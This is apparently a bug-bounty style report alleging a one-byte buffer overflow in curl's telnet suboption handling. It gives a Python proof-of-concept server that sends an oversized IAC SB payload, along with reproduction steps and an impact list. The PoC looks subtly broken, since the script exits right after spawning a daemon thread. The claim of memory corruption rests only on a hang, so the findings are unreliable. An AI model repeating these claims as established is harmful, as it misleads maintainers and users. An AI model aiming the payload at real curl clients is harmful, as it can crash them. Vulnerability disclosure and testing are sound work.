Curl Telnet Handler Buffer Overflow

## Summary: I found a buffer overflow in curl's telnet protocol handler that allows remote memory corruption without authentication. The bug is in the CURL_SB_ACCUM macro in lib/telnet.c line 69, where the bounds check lets you write one byte past the end of a 512-byte buffer. When curl receives 512+ bytes in a telnet suboption, it overflows into adjacent memory and corrupts the telnet state machine. ```python import socket import threading import time def exploit(port=8023): def handle(client): time.sleep(0.2) client.send(b'\xff\xfd\x18') time.sleep(0.3) payload = b'\xff\xfa' + b'A' * 513 + b'\xff\xf0' client.send(payload) client.close() s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.bind(('127.0.0.1', port)) s.listen(1) threading.Thread(target=lambda: handle(s.accept()[0]), daemon=True).start() return s exploit(8023) ``` ## Affected version curl 8.19.0-DEV (x86_64-pc-linux-gnu) libcurl 8.19.0-DEV Built from source on Ubuntu/Linux with debug enabled Telnet protocol support enabled by default ## Steps To Reproduce: 1. Terminal 1: Run the exploit server ```bash python3 poc.py ``` 2. Terminal 2: Connect with curl ```bash ./src/curl telnet://127.0.0.1:8023 ``` 3. Expected result: curl hangs indefinitely due to memory corruption (timeout exit code 124) 4. Normal behavior: curl should connect and disconnect cleanly when connecting to a non-malicious server The vulnerability triggers when curl receives a telnet suboption (IAC SB) followed by 513+ bytes of data, causing the subbuffer[512] to overflow into adjacent struct fields. ## Impact - **Denial of Service**: Confirmed - curl hangs indefinitely (timeout exit code 124) - **Memory Corruption**: Overwrites adjacent struct fields in TELNET structure - **State Machine Corruption**: Telnet protocol state becomes invalid - **No Authentication Required**: Exploitable over network without credentials